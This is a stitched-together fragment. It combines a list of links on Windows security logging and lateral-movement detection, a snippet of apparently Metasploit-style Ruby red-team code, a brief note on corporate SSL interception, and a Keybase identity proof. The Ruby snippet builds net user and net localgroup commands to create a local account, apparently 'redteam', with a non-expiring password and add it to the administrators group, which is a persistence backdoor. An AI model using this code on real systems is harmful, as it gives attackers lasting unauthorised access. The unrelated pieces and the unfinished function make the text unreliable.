- https://devops-collective-inc.gitbook.io/secrets-of-powershell-remoting/about-this-book
- https://www.fortynorthsecurity.com/mass-powershell-and-wmimplant/
- https://ponderthebits.com/2018/02/windows-rdp-related-event-logs-identification-tracking-and-investigation/
- https://rlevchenko.com/2017/03/17/how-easy-is-it-to-track-group-policy-changes-using-the-event-log/
- http://www.redblue.team/2015/09/spotting-adversary-with-windows-event.html
- https://blogs.technet.microsoft.com/ashleymcglone/2015/03/20/deploy-active-directory-with-powershell-dsc-a-k-a-dsc-promo/
- https://github.com/JacksonVD/PwnedPasswordsDLL
- https://stealthpuppy.com/deploy-enterprise-root-certificate-authority/
- https://blog.flux7.com/how-to-organize-infrastructure-as-code-in-your-source-code-repository
- https://logrhythm.com/blog/detecting-lateral-movement-from-pass-the-hash-attacks/
#add_admin_windows(client, redteam, password)
#add_admin_linux(client, redteam, password)
def add_admin_windows(session, username, userpasswd)
  print_status("adding admin user: #{username}")
  # Ref: https://www.windows-commandline.com/add-user-from-command-line/
  # Double quotes are required for #{...} interpolation in Ruby.
  add_user_cmd="cmd.exe /c net user #{username} #{userpasswd} /ADD /PASSWORDCHG:NO"
  make_user_admin_cmd="cmd.exe /c net localgroup administrators #{username} /add"
When working inside a company network that uses a self-signed certificate to monitor SSL traffic, various programs will start failing.
Here is a list of them and how to resolve the issue.
Extract the root CA and install it on the host.
I hereby claim:
- I am chandanchowdhury on github.
- I am i_virus (https://keybase.io/i_virus) on keybase.
- I have a public key whose fingerprint is 8624 5273 7827 9AC4 E1D9 B257 1F56 4FEC 8D26 4684
To claim this, I am signing this object: